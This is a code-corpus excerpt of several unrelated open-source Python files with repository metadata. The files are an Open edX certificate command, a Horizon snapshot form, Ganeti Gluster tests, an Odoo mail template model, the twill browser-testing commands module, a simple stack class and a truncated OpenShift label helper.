required=True,
help='The course id (e.g., mit/6-002x/circuits-and-electronics) for which the student '
'named in <username> should be graded')
parser.add_argument('-u', '--user',
metavar='USERNAME',
dest='username',
required=True,
help='The username or email address for whom grading and certification should be requested')
parser.add_argument('-G', '--grade',
metavar='GRADE',
dest='grade_value',
default=None,
help='The grade string, such as "Distinction", which is passed to the certificate agent')
parser.add_argument('-T', '--template',
metavar='TEMPLATE',
dest='template_file',
default=None,
help='The template file used to render this certificate, like "QMSE01-distinction.pdf"')
def handle(self, *args, **options):
# Scrub the username from the log message
cleaned_options = copy.copy(options)
if 'username' in cleaned_options:
cleaned_options['username'] = '<USERNAME>'
LOGGER.info(
(
u"Starting to create tasks to regenerate certificates "
u"with arguments %s and options %s"
),
text_type(args),
text_type(cleaned_options)
)
# try to parse out the course from the serialized form
course_id = CourseKey.from_string(options['course'])
user = options['username']
if '@' in user:
student = User.objects.get(email=user, courseenrollment__course_id=course_id)
else:
student = User.objects.get(username=user, courseenrollment__course_id=course_id)
course = modulestore().get_course(course_id, depth=2)
if not options['noop']:
LOGGER.info(
(
u"Adding task to the XQueue to generate a certificate "
u"for student %s in course '%s'."
),
student.id,
course_id
)
if badges_enabled() and course.issue_badges:
badge_class = get_completion_badge(course_id, student)
badge = badge_class.get_for_user(student)
if badge:
badge.delete()
LOGGER.info(u"Cleared badge for student %s.", student.id)
# Add the certificate request to the queue
ret = regenerate_user_certificates(
student, course_id, course=course,
forced_grade=options['grade_value'],
template_file=options['template_file'],
insecure=options['insecure']
)
LOGGER.info(
(
u"Added a certificate regeneration task to the XQueue "
u"for student %s in course '%s'. "
u"The new certificate status is '%s'."
),
student.id,
text_type(course_id),
ret
)
else:
LOGGER.info(
(
u"Skipping certificate generation for "
u"student %s in course '%s' "
u"because the noop flag is set."
),
student.id,
text_type(course_id)
)
LOGGER.info(
(
u"Finished regenerating certificates command for "
u"user %s and course '%s'."
),
student.id,
text_type(course_id)
)
| agpl-3.0 | -2,069,358,726,322,033,400 | 37.826087 | 120 | 0.513438 | false |
VaneCloud/horizon | openstack_dashboard/dashboards/project/volumes/snapshots/forms.py | 72 | 1841 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard.api import cinder
class UpdateForm(forms.SelfHandlingForm):
name = forms.CharField(max_length=255, label=_("Snapshot Name"))
description = forms.CharField(max_length=255,
widget=forms.Textarea(attrs={'rows': 4}),
label=_("Description"),
required=False)
def handle(self, request, data):
snapshot_id = self.initial['snapshot_id']
try:
cinder.volume_snapshot_update(request,
snapshot_id,
data['name'],
data['description'])
message = _('Updating volume snapshot "%s"') % data['name']
messages.info(request, message)
return True
except Exception:
redirect = reverse("horizon:project:volumes:index")
exceptions.handle(request,
_('Unable to update volume snapshot.'),
redirect=redirect)
| apache-2.0 | -2,058,576,810,762,252,300 | 39.021739 | 75 | 0.603476 | false |
ganeti/ganeti | test/py/ganeti.storage.gluster_unittest.py | 1 | 7056 | #!/usr/bin/python3
#
# Copyright (C) 2013, 2016 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script for unittesting the ganeti.storage.gluster module"""
import os
import shutil
import tempfile
import unittest
import mock
from ganeti import constants
from ganeti import errors
from ganeti.storage import gluster
from ganeti import ssconf
from ganeti import utils
import testutils
class TestGlusterVolume(testutils.GanetiTestCase):
testAddrIpv = {4: "203.0.113.42",
6: "2001:DB8::74:65:28:6:69",
}
@staticmethod
def _MakeVolume(addr=None, port=9001,
run_cmd=NotImplemented,
vol_name="pinky"):
addr = addr if addr is not None else TestGlusterVolume.testAddrIpv[4]
return gluster.GlusterVolume(addr, port, vol_name, _run_cmd=run_cmd,
_mount_point="/invalid")
def setUp(self):
testutils.GanetiTestCase.setUp(self)
# Create some volumes.
self.vol_a = TestGlusterVolume._MakeVolume()
self.vol_a_clone = TestGlusterVolume._MakeVolume()
self.vol_b = TestGlusterVolume._MakeVolume(vol_name="pinker")
def testEquality(self):
self.assertEqual(self.vol_a, self.vol_a_clone)
def testInequality(self):
self.assertNotEqual(self.vol_a, self.vol_b)
def testHostnameResolution(self):
vol_1 = TestGlusterVolume._MakeVolume(addr="localhost")
self.assertTrue(vol_1.server_ip in ["127.0.0.1", "::1"],
msg="%s not an IP of localhost" % (vol_1.server_ip,))
self.assertRaises(errors.ResolverError, lambda: \
TestGlusterVolume._MakeVolume(addr="E_NOENT"))
def testKVMMountStrings(self):
# The only source of documentation I can find is:
# https://github.com/qemu/qemu/commit/8d6d89c
# This test gets as close as possible to the examples given there,
# within the limits of our implementation (no transport specification,
# no default port version).
vol_1 = TestGlusterVolume._MakeVolume(addr=TestGlusterVolume.testAddrIpv[4],
port=24007,
vol_name="testvol")
self.assertEqual(
vol_1.GetKVMMountString("dir/a.img"),
"gluster://203.0.113.42:24007/testvol/dir/a.img"
)
vol_2 = TestGlusterVolume._MakeVolume(addr=TestGlusterVolume.testAddrIpv[6],
port=24007,
vol_name="testvol")
self.assertEqual(
vol_2.GetKVMMountString("dir/a.img"),
"gluster://[2001:db8:0:74:65:28:6:69]:24007/testvol/dir/a.img"
)
vol_3 = TestGlusterVolume._MakeVolume(addr="localhost",
port=9001,
vol_name="testvol")
kvmMountString = vol_3.GetKVMMountString("dir/a.img")
self.assertTrue(
kvmMountString in
["gluster://127.0.0.1:9001/testvol/dir/a.img",
"gluster://[::1]:9001/testvol/dir/a.img"],
msg="%s is not volume testvol/dir/a.img on localhost" % (kvmMountString,)
)
def testFUSEMountStrings(self):
vol_1 = TestGlusterVolume._MakeVolume(addr=TestGlusterVolume.testAddrIpv[4],
port=24007,
vol_name="testvol")
self.assertEqual(
vol_1._GetFUSEMountString(),
"-o server-port=24007 203.0.113.42:/testvol"
)
vol_2 = TestGlusterVolume._MakeVolume(addr=TestGlusterVolume.testAddrIpv[6],
port=24007,
vol_name="testvol")
# This _ought_ to work. https://bugzilla.redhat.com/show_bug.cgi?id=764188
self.assertEqual(
vol_2._GetFUSEMountString(),
"-o server-port=24007 2001:db8:0:74:65:28:6:69:/testvol"
)
vol_3 = TestGlusterVolume._MakeVolume(addr="localhost",
port=9001,
vol_name="testvol")
fuseMountString = vol_3._GetFUSEMountString()
self.assertTrue(fuseMountString in
["-o server-port=9001 127.0.0.1:/testvol",
"-o server-port=9001 ::1:/testvol"],
msg="%s not testvol on localhost:9001" % (fuseMountString,))
class TestGlusterStorage(testutils.GanetiTestCase):
def setUp(self):
"""Set up test data"""
testutils.GanetiTestCase.setUp(self)
self.test_params = {
constants.GLUSTER_HOST: "127.0.0.1",
constants.GLUSTER_PORT: "24007",
constants.GLUSTER_VOLUME: "/testvol"
}
self.test_unique_id = ("testdriver", "testpath")
@testutils.patch_object(gluster.FileDeviceHelper, "CreateFile")
@testutils.patch_object(gluster.GlusterVolume, "Mount")
@testutils.patch_object(ssconf.SimpleStore, "GetGlusterStorageDir")
@testutils.patch_object(gluster.GlusterStorage, "Attach")
def testCreate(self, attach_mock, storage_dir_mock,
mount_mock, create_file_mock):
attach_mock.return_value = True
storage_dir_mock.return_value = "/testmount"
expect = gluster.GlusterStorage(self.test_unique_id, [], 123,
self.test_params, {})
got = gluster.GlusterStorage.Create(self.test_unique_id, [], 123, None,
self.test_params, False, {},
test_kwarg="test")
self.assertEqual(expect, got)
def testCreateFailure(self):
self.assertRaises(errors.ProgrammerError, gluster.GlusterStorage.Create,
self.test_unique_id, [], 123, None,
self.test_params, True, {})
if __name__ == "__main__":
testutils.GanetiTestProgram()
| bsd-2-clause | -8,493,400,030,548,871,000 | 37.557377 | 80 | 0.629819 | false |
elego/tkobr-addons | tko_email_template_restrict_by_group/models/mail_template.py | 1 | 1160 | # -*- coding: utf-8 -*-
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
# Thinkopen - Brasil
# Copyright (C) Thinkopen Solutions (<http://www.thinkopensolutions.com.br>)
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from odoo import models, fields, api
class MailTemplate(models.Model):
"Templates for sending email"
_inherit = "mail.template"
group_ids = fields.Many2many('res.groups', 'mail_template_groups_rel', 'template_id', 'group_id', string='Groups')
template_user_ids = fields.Many2many('res.users', 'mail_template_user_ids_rel','template_id','user_id',compute='get_template_user_ids', string='Users',store=True)
@api.one
@api.depends('group_ids.users')
def get_template_user_ids(self):
user_ids = []
for group in self.group_ids:
for user in group.users:
if user.id not in user_ids:
user_ids.append(user.id)
if not self.group_ids:
user_ids = self.env['res.users'].search([('active','=',True)]).ids
self.template_user_ids = [(6, 0, user_ids)]
| agpl-3.0 | 2,005,225,474,380,050,700 | 37.666667 | 166 | 0.62931 | false |
jasrusable/fun | venv/lib/python2.7/site-packages/twill/commands.py | 19 | 23001 | """
Implementation of all of the individual 'twill' commands available through
twill-sh.
"""
import sys
import _mechanize_dist as mechanize
from _mechanize_dist import ClientForm
from _mechanize_dist._headersutil import is_html
OUT=None
ERR=sys.stderr
# export:
__all__ = ['get_browser',
'reset_browser',
'extend_with',
'exit',
'go',
'reload',
'url',
'code',
'follow',
'find',
'notfind',
'back',
'show',
'echo',
'save_html',
'sleep',
'agent',
'showforms',
'showlinks',
'showhistory',
'submit',
'formvalue',
'fv',
'formaction',
'fa',
'formclear',
'formfile',
'getinput',
'getpassword',
'save_cookies',
'load_cookies',
'clear_cookies',
'show_cookies',
'add_auth',
'run',
'runfile',
'setglobal',
'setlocal',
'debug',
'title',
'exit',
'config',
'tidy_ok',
'redirect_output',
'reset_output',
'redirect_error',
'reset_error',
'add_extra_header',
'show_extra_headers',
'clear_extra_headers',
'info'
]
import re, getpass, time
from browser import TwillBrowser
from errors import TwillException, TwillAssertionError
import utils
from utils import set_form_control_value, run_tidy
from namespaces import get_twill_glocals
browser = TwillBrowser()
def get_browser():
return browser
def reset_browser():
"""
>> reset_browser
Reset the browser completely.
"""
global browser
browser._browser.close()
browser = TwillBrowser()
global _options
_options = {}
_options.update(_orig_options)
###
def exit(code="0"):
"""
exit [<code>]
Exits twill, with the given exit code (defaults to 0, "no error").
"""
raise SystemExit(int(code))
def go(url):
"""
>> go <url>
Visit the URL given.
"""
browser.go(url)
return browser.get_url()
def reload():
"""
>> reload
Reload the current URL.
"""
browser.reload()
return browser.get_url()
def code(should_be):
"""
>> code <int>
Check to make sure the response code for the last page is as given.
"""
should_be = int(should_be)
if browser.get_code() != int(should_be):
raise TwillAssertionError("code is %s != %s" % (browser.get_code(),
should_be))
def tidy_ok():
"""
>> tidy_ok
Assert that 'tidy' produces no warnings or errors when run on the current
page.
If 'tidy' cannot be run, will fail silently (unless 'tidy_should_exist'
option is true; see 'config' command).
"""
page = browser.get_html()
if page is None:
raise TwillAssertionError("not viewing HTML!")
(clean_page, errors) = run_tidy(page)
if clean_page is None: # tidy doesn't exist...
if _options.get('tidy_should_exist'):
raise TwillAssertionError("cannot run 'tidy'")
elif errors:
raise TwillAssertionError("tidy errors:\n====\n%s\n====\n" % (errors,))
# page is fine.
def url(should_be):
"""
>> url <regexp>
Check to make sure that the current URL matches the regexp. The local
variable __match__ is set to the matching part of the URL.
"""
regexp = re.compile(should_be)
current_url = browser.get_url()
m = None
if current_url is not None:
m = regexp.search(current_url)
else:
current_url = ''
if not m:
raise TwillAssertionError("""\
current url is '%s';
does not match '%s'
""" % (current_url, should_be,))
if m.groups():
match_str = m.group(1)
else:
match_str = m.group(0)
global_dict, local_dict = get_twill_glocals()
local_dict['__match__'] = match_str
return match_str
def follow(what):
"""
>> follow <regexp>
Find the first matching link on the page & visit it.
"""
regexp = re.compile(what)
link = browser.find_link(regexp)
if link:
browser.follow_link(link)
return browser.get_url()
raise TwillAssertionError("no links match to '%s'" % (what,))
def _parseFindFlags(flags):
KNOWN_FLAGS = {
'i': re.IGNORECASE,
'm': re.MULTILINE,
's': re.DOTALL,
}
finalFlags = 0
for char in flags:
try:
finalFlags |= KNOWN_FLAGS[char]
except IndexError:
raise TwillAssertionError("unknown 'find' flag %r" % char)
return finalFlags
def find(what, flags=''):
"""
>> find <regexp> [<flags>]
Succeed if the regular expression is on the page. Sets the local
variable __match__ to the matching text.
Flags is a string consisting of the following characters:
* i: ignorecase
* m: multiline
* s: dotall
For explanations of these, please see the Python re module
documentation.
"""
regexp = re.compile(what, _parseFindFlags(flags))
page = browser.get_html()
m = regexp.search(page)
if not m:
raise TwillAssertionError("no match to '%s'" % (what,))
if m.groups():
match_str = m.group(1)
else:
match_str = m.group(0)
_, local_dict = get_twill_glocals()
local_dict['__match__'] = match_str
def notfind(what, flags=''):
"""
>> notfind <regexp> [<flags>]
Fail if the regular expression is on the page.
"""
regexp = re.compile(what, _parseFindFlags(flags))
page = browser.get_html()
if regexp.search(page):
raise TwillAssertionError("match to '%s'" % (what,))
def back():
"""
>> back
Return to the previous page.
"""
browser.back()
return browser.get_url()
def show():
"""
>> show
Show the HTML for the current page.
"""
html = browser.get_html()
print>>OUT, html
return html
def echo(*strs):
"""
>> echo <list> <of> <strings>
Echo the arguments to the screen.
"""
strs = map(str, strs)
s = " ".join(strs)
print>>OUT, s
def save_html(filename=None):
"""
>> save_html [<filename>]
Save the HTML for the current page into <filename>. If no filename
given, construct the filename from the URL.
"""
html = browser.get_html()
if html is None:
print>>OUT, "No page to save."
return
if filename is None:
url = browser.get_url()
url = url.split('?')[0]
filename = url.split('/')[-1]
if filename is "":
filename = 'index.html'
print>>OUT, "(Using filename '%s')" % (filename,)
f = open(filename, 'w')
f.write(html)
f.close()
def sleep(interval=1):
"""
>> sleep [<interval>]
Sleep for the specified amount of time.
If no interval is given, sleep for 1 second.
"""
time.sleep(float(interval))
_agent_map = dict(
ie5='Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1)',
ie55='Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.1)',
ie6='Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
moz17='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616',
opera7='Opera/7.0 (Windows NT 5.1; U) [en]',
konq32='Mozilla/5.0 (compatible; Konqueror/3.2.3; Linux 2.4.14; X11; i686)',
saf11='Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/100 (KHTML, like Gecko) Safari/100',
aol9='Mozilla/4.0 (compatible; MSIE 5.5; AOL 9.0; Windows NT 5.1)',)
def agent(what):
"""
>> agent <agent>
Set the agent string (identifying the browser brand).
Some convenient shortcuts:
ie5, ie55, ie6, moz17, opera7, konq32, saf11, aol9.
"""
what = what.strip()
agent = _agent_map.get(what, what)
browser.set_agent_string(agent)
def submit(submit_button=None):
"""
>> submit [<buttonspec>]
Submit the current form (the one last clicked on) by clicking on the
n'th submission button. If no "buttonspec" is given, submit the current
form by using the last clicked submit button.
The form to submit is the last form clicked on with a 'formvalue' command.
The button used to submit is chosen based on 'buttonspec'. If 'buttonspec'
is given, it's matched against buttons using the same rules that
'formvalue' uses. If 'buttonspec' is not given, submit uses the last
submit button clicked on by 'formvalue'. If none can be found,
submit submits the form with no submit button clicked.
"""
browser.submit(submit_button)
def showforms():
"""
>> showforms
Show all of the forms on the current page.
"""
browser.showforms()
return browser._browser.forms()
def showlinks():
"""
>> showlinks
Show all of the links on the current page.
"""
browser.showlinks()
return browser._browser.links()
def showhistory():
"""
>> showhistory
Show the browser history (what URLs were visited).
"""
browser.showhistory()
return browser._browser._history
def formclear(formname):
"""
>> formclear <formname>
Run 'clear' on all of the controls in this form.
"""
form = browser.get_form(formname)
for control in form.controls:
if control.readonly:
continue
control.clear()
def formvalue(formname, fieldname, value):
"""
>> formvalue <formname> <field> <value>
Set value of a form field.
There are some ambiguities in the way formvalue deals with lists:
'formvalue' will *add* the given value to a list of multiple selection,
for lists that allow it.
Forms are matched against 'formname' as follows:
1. regexp match to actual form name;
2. if 'formname' is an integer, it's tried as an index.
Form controls are matched against 'fieldname' as follows:
1. unique exact match to control name;
2. unique regexp match to control name;
3. if fieldname is an integer, it's tried as an index;
4. unique & exact match to submit-button values.
Formvalue ignores read-only fields completely; if they're readonly,
nothing is done, unless the config options ('config' command) are
changed.
'formvalue' is available as 'fv' as well.
"""
form = browser.get_form(formname)
if not form:
raise TwillAssertionError("no matching forms!")
control = browser.get_form_field(form, fieldname)
browser.clicked(form, control)
if control.readonly and _options['readonly_controls_writeable']:
print>>OUT, 'forcing read-only form field to writeable'
control.readonly = False
if control.readonly or isinstance(control, ClientForm.IgnoreControl):
print>>OUT, 'form field is read-only or ignorable; nothing done.'
return
if isinstance(control, ClientForm.FileControl):
raise TwillException('form field is for file upload; use "formfile" instead')
set_form_control_value(control, value)
fv = formvalue
def formaction(formname, action):
"""
>> formaction <formname> <action_url>
Sets action parameter on form to action_url
"""
form = browser.get_form(formname)
form.action = action
fa = formaction
def formfile(formname, fieldname, filename, content_type=None):
"""
>> formfile <form> <field> <filename> [ <content_type> ]
Upload a file via an "upload file" form field.
"""
import os.path
filename = filename.replace('/', os.path.sep)
form = browser.get_form(formname)
control = browser.get_form_field(form, fieldname)
if not control.is_of_kind('file'):
raise TwillException('ERROR: field is not a file upload field!')
browser.clicked(form, control)
fp = open(filename, 'rb')
control.add_file(fp, content_type, filename)
print>>OUT, '\nAdded file "%s" to file upload field "%s"\n' % (filename,
control.name,)
def extend_with(module_name):
"""
>> extend_with <module>
Import contents of given module.
"""
global_dict, local_dict = get_twill_glocals()
exec "from %s import *" % (module_name,) in global_dict
### now add the commands into the commands available for the shell,
### and print out some nice stuff about what the extension module does.
import sys
mod = sys.modules.get(module_name)
###
import twill.shell, twill.parse
fnlist = getattr(mod, '__all__', None)
if fnlist is None:
fnlist = [ fn for fn in dir(mod) if callable(getattr(mod, fn)) ]
for command in fnlist:
fn = getattr(mod, command)
twill.shell.add_command(command, fn.__doc__)
twill.parse.command_list.append(command)
###
print>>OUT, "Imported extension module '%s'." % (module_name,)
print>>OUT, "(at %s)\n" % (mod.__file__,)
if twill.shell.interactive:
if mod.__doc__:
print>>OUT, "Description:\n\n%s\n" % (mod.__doc__.strip(),)
else:
if fnlist:
print>>OUT, 'New commands:\n'
for name in fnlist:
print>>OUT, '\t', name
print>>OUT, ''
def getinput(prompt):
"""
>> getinput <prompt>
Get input, store it in '__input__'.
"""
_, local_dict = get_twill_glocals()
inp = raw_input(prompt)
local_dict['__input__'] = inp
return inp
def getpassword(prompt):
"""
>> getpassword <prompt>
Get a password ("invisible input"), store it in '__password__'.
"""
_, local_dict = get_twill_glocals()
inp = getpass.getpass(prompt)
local_dict['__password__'] = inp
return inp
def save_cookies(filename):
"""
>> save_cookies <filename>
Save all of the current cookies to the given file.
"""
browser.save_cookies(filename)
def load_cookies(filename):
"""
>> load_cookies <filename>
Clear the cookie jar and load cookies from the given file.
"""
browser.load_cookies(filename)
def clear_cookies():
"""
>> clear_cookies
Clear the cookie jar.
"""
browser.clear_cookies()
def show_cookies():
"""
>> show_cookies
Show all of the cookies in the cookie jar.
"""
browser.show_cookies()
def add_auth(realm, uri, user, passwd):
"""
>> add_auth <realm> <uri> <user> <passwd>
Add HTTP Basic Authentication information for the given realm/uri.
"""
# swap around the type of HTTPPasswordMgr and
# HTTPPasswordMgrWithDefaultRealm depending on if with_default_realm
# is on or not.
if _options['with_default_realm']:
realm = None
if browser.creds.__class__ == mechanize.HTTPPasswordMgr:
passwds = browser.creds.passwd
browser.creds = mechanize.HTTPPasswordMgrWithDefaultRealm()
browser.creds.passwd = passwds
print>>OUT, 'Changed to using HTTPPasswordMgrWithDefaultRealm'
else:
if browser.creds.__class__ == mechanize.HTTPPasswordMgrWithDefaultRealm:
passwds = browser.creds.passwd
browser.creds = mechanize.HTTPPasswordMgr()
browser.creds.passwd = passwds
print>>OUT, 'Changed to using HTTPPasswordMgr'
browser.creds.add_password(realm, uri, user, passwd)
print>>OUT, "Added auth info: realm '%s' / URI '%s' / user '%s'" % (realm,
uri,
user,)
def debug(what, level):
"""
>> debug <what> <level>
<what> can be:
* http (any level >= 1), to display the HTTP transactions.
* commands (any level >= 1), to display the commands being executed.
* equiv-refresh (any level >= 1) to display HTTP-EQUIV refresh handling.
"""
import parse
try:
level = int(level)
except ValueError:
flag = utils.make_boolean(level)
if flag:
level = 1
else:
level = 0
print>>OUT, 'DEBUG: setting %s debugging to level %d' % (what, level)
if what == "http":
browser._browser.set_debug_http(level)
elif what == 'equiv-refresh':
if level:
utils._debug_print_refresh = True
else:
utils._debug_print_refresh = False
elif what == 'commands':
if level:
parse.debug_print_commands(True)
else:
parse.debug_print_commands(False)
else:
raise TwillException('unknown debugging type: "%s"' % (what,))
def run(cmd):
"""
>> run <command>
<command> can be any valid python command; 'exec' is used to run it.
"""
# @CTB: use pyparsing to grok the command? make sure that quoting works...
# execute command.
global_dict, local_dict = get_twill_glocals()
import commands
# set __url__
local_dict['__cmd__'] = cmd
local_dict['__url__'] = commands.browser.get_url()
exec(cmd, global_dict, local_dict)
def runfile(*files):
"""
>> runfile <file1> [ <file2> ... ]
"""
import parse
global_dict, local_dict = get_twill_glocals()
for f in files:
parse.execute_file(f, no_reset=True)
def setglobal(name, value):
"""
setglobal <name> <value>
Sets the variable <name> to the value <value> in the global namespace.
"""
global_dict, local_dict = get_twill_glocals()
global_dict[name] = value
def setlocal(name, value):
"""
setlocal <name> <value>
Sets the variable <name> to the value <value> in the local namespace.
"""
global_dict, local_dict = get_twill_glocals()
local_dict[name] = value
def title(what):
"""
>> title <regexp>
Succeed if the regular expression is in the page title.
"""
regexp = re.compile(what)
title = browser.get_title()
print>>OUT, "title is '%s'." % (title,)
m = regexp.search(title)
if not m:
raise TwillAssertionError("title does not contain '%s'" % (what,))
if m.groups():
match_str = m.group(1)
else:
match_str = m.group(0)
global_dict, local_dict = get_twill_glocals()
local_dict['__match__'] = match_str
return match_str
def redirect_output(filename):
"""
>> redirect_output <filename>
Append all twill output to the given file.
"""
import twill
fp = open(filename, 'a')
twill.set_output(fp)
def reset_output():
"""
>> reset_output
Reset twill output to go to the screen.
"""
import twill
twill.set_output(None)
def redirect_error(filename):
"""
>> redirect_error <filename>
Append all twill error output to the given file.
"""
import twill
fp = open(filename, 'a')
twill.set_errout(fp)
def reset_error():
"""
>> reset_error
Reset twill error output to go to the screen.
"""
import twill
twill.set_errout(None)
def add_extra_header(header_key, header_value):
"""
>> add_header <name> <value>
Add an HTTP header to each HTTP request. See 'show_extra_headers' and
'clear_extra_headers'.
"""
browser._browser.addheaders += [(header_key, header_value)]
def show_extra_headers():
"""
>> show_extra_headers
Show any extra headers being added to each HTTP request.
"""
l = browser._browser.addheaders
if l:
print 'The following HTTP headers are added to each request:'
for k, v in l:
print ' "%s" = "%s"' % (k, v,)
print ''
else:
print '** no extra HTTP headers **'
def clear_extra_headers():
"""
>> clear_extra_headers
Remove all user-defined HTTP headers. See 'add_extra_header' and
'show_extra_headers'.
"""
browser._browser.addheaders = []
### options
_orig_options = dict(readonly_controls_writeable=False,
use_tidy=True,
require_tidy=False,
use_BeautifulSoup=True,
require_BeautifulSoup=False,
allow_parse_errors=True,
with_default_realm=False,
acknowledge_equiv_refresh=True
)
_options = {}
_options.update(_orig_options) # make a copy
def config(key=None, value=None):
"""
>> config [<key> [<int value>]]
Configure/report various options. If no <value> is given, report
the current key value; if no <key> given, report current settings.
So far:
* 'acknowledge_equiv_refresh', default 1 -- follow HTTP-EQUIV=REFRESH
* 'readonly_controls_writeable', default 0 -- make ro controls writeable
* 'require_tidy', default 0 -- *require* that tidy be installed
* 'use_BeautifulSoup', default 1 -- use the BeautifulSoup parser
* 'use_tidy', default 1 -- use tidy, if it's installed
* 'with_default_realm', default 0 -- use a default realm for HTTP AUTH
Deprecated:
* 'allow_parse_errors' has been removed.
"""
import utils
if key is None:
keys = _options.keys()
keys.sort()
print>>OUT, 'current configuration:'
for k in keys:
print>>OUT, '\t%s : %s' % (k, _options[k])
print>>OUT, ''
else:
v = _options.get(key)
if v is None:
print>>OUT, '*** no such configuration key', key
print>>OUT, 'valid keys are:', ";".join(_options.keys())
raise TwillException('no such configuration key: %s' % (key,))
elif value is None:
print>>OUT, ''
print>>OUT, 'key %s: value %s' % (key, v)
print>>OUT, ''
else:
value = utils.make_boolean(value)
_options[key] = value
def info():
"""
>> info
Report information on current page.
"""
current_url = browser.get_url()
if current_url is None:
print "We're not on a page!"
return
content_type = browser._browser._response.info().getheaders("content-type")
check_html = is_html(content_type, current_url)
code = browser.get_code()
print >>OUT, '\nPage information:'
print >>OUT, '\tURL:', current_url
print >>OUT, '\tHTTP code:', code
print >>OUT, '\tContent type:', content_type[0],
if check_html:
print >>OUT, '(HTML)'
else:
print ''
if check_html:
title = browser.get_title()
print >>OUT, '\tPage title:', title
forms = browser.get_all_forms()
if len(forms):
print >>OUT, '\tThis page contains %d form(s)' % (len(forms),)
print >>OUT, ''
| gpl-2.0 | -8,889,449,112,937,615,000 | 24.756999 | 107 | 0.57741 | false |
sjschmidt44/python_data_structures | data_structures/stack.py | 1 | 1071 | from node import Node
class Stack():
def __init__(self):
self.top = None
self.size = 0
def __repr__(self):
return 'The stack has {num} Nodes, and {top} is at the top'.format(
num=self.size, top=self.top)
def push(self, val):
'''Add a value to the head of the stack.
args:
val: The value to add to the stack'''
if self.top is None:
self.top = Node(val)
else:
temp = self.top
self.top = Node(val)
temp.next = self.top
self.top.prev = temp
self.size += 1
def pop(self):
'''Remove a value from head of stack and return.'''
try:
temp = self.top
self.top = temp.prev
temp.prev = None
self.top.next = None
self.size -= 1
return temp.val
except IndexError:
return 'The stack is empty.'
def peek(self):
'''Returns a value from the head of the stack.'''
return self.top.val
| mit | -8,825,053,508,267,262,000 | 25.121951 | 75 | 0.493931 | false |
rhdedgar/openshift-tools | openshift/installer/vendored/openshift-ansible-3.5.127/roles/lib_openshift/src/class/oc_label.py | 20 | 9497 | # pylint: skip-file
# flake8: noqa
# pylint: disable=too-many-instance-attributes
class OCLabel(OpenShiftCLI):
''' Class to wrap the oc command line tools '''
# pylint allows 5
# pylint: disable=too-many-arguments
def __init__(self,
name,
namespace,
kind,
kubeconfig,
labels=None,
selector=None,
verbose=False):
''' Constructor for OCLabel '''
super(OCLabel, self).__init__(namespace, kubeconfig=kubeconfig, verbose=verbose)
self.name = name
self.kind = kind
self.labels = labels
self._curr_labels = None
self.selector = selector
@property
def current_labels(self):
'''property for the current labels'''
if self._curr_labels is None:
results = self.get()
self._curr_labels = results['labels']
return self._curr_labels
@current_labels.setter
def current_labels(self, data):
'''property setter for current labels'''
self._curr_labels = data
def compare_labels(self, host_labels):
''' compare incoming labels against current labels'''
for label in self.labels:
if label['key'] not in host_labels or \
label['value'] != host_labels[label['key']]:
return False
return True
def all_user_labels_exist(self):
''' return whether all the labels already exist '''
for current_host_labels in self.current_labels:
rbool = self.compare_labels(current_host_labels)
if not rbool:
return False
return True
def any_label_exists(self):
''' return whether any single label already exists '''
for current_host_labels in self.current_labels:
for label in self.labels:
if label['key'] in current_host_labels:
return True
return False
def get_user_keys(self):
''' go through list of user key:values and return all keys '''
user_keys = []
for label in self.labels:
user_keys.append(label['key'])
return user_keys
def get_current_label_keys(self):
''' collect all the current label keys '''
current_label_keys = []
for current_host_labels in self.current_labels:
for key in current_host_labels.keys():
current_label_keys.append(key)
return list(set(current_label_keys))
def get_extra_current_labels(self):
''' return list of labels that are currently stored, but aren't
in user-provided list '''
extra_labels = []
user_label_keys = self.get_user_keys()
current_label_keys = self.get_current_label_keys()
for current_key in current_label_keys:
if current_key not in user_label_keys:
extra_labels.append(current_key)
return extra_labels
def extra_current_labels(self):
''' return whether there are labels currently stored that user
hasn't directly provided '''
extra_labels = self.get_extra_current_labels()
if len(extra_labels) > 0:
return True
return False
def replace(self):
''' replace currently stored labels with user provided labels '''
cmd = self.cmd_template()
# First delete any extra labels
extra_labels = self.get_extra_current_labels()
if len(extra_labels) > 0:
for label in extra_labels:
cmd.append("{}-".format(label))
# Now add/modify the user-provided label list
if len(self.labels) > 0:
